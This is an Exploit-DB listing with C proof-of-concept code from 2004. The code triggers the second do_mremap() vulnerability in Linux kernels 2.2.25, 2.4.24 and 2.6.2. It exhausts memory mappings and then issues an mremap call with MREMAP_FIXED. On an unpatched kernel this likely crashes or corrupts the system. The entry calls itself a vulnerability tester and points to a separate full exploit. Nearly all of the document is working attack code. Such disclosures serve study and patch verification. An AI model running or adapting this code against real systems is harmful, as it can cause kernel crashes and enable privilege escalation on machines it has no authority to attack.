Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator

EDB-ID:

154


Platform:

Linux

Published:

2004-02-18

/*
 *  Proof-of-concept exploit code for do_mremap() #2
 *
 * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
 * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
 *
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */


#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>


#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2


#define MREMAP_FLAGS  MREMAP_MAYMOVE | MREMAP_FIXED


#define __NR_real_mremap __NR_mremap


static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );


#define VMA_SIZE 0x00003000


int main( void )
{
    int i, ret;
    void *base0;
    void *base1;


    i = 0;


    while( 1 )
    {
        i++;


        ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
                          VMA_SIZE, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );


        if( ret == -1 )
        {
            perror( "mmap" );
            break;
        }


        base0 = base1;
        base1 = (void *) ret;
    }


    printf( "created ~%d VMAs\n", i );


    base0 += 0x1000;
    base1 += 0x1000;


    printf( "now mremapping 0x%08X at 0x%08X\n",
            (int) base1, (int) base0 );


    real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );


    printf( "kernel may not be vulnerable\n" );


    return( 0 );
}


// milw0rm.com [2004-02-18]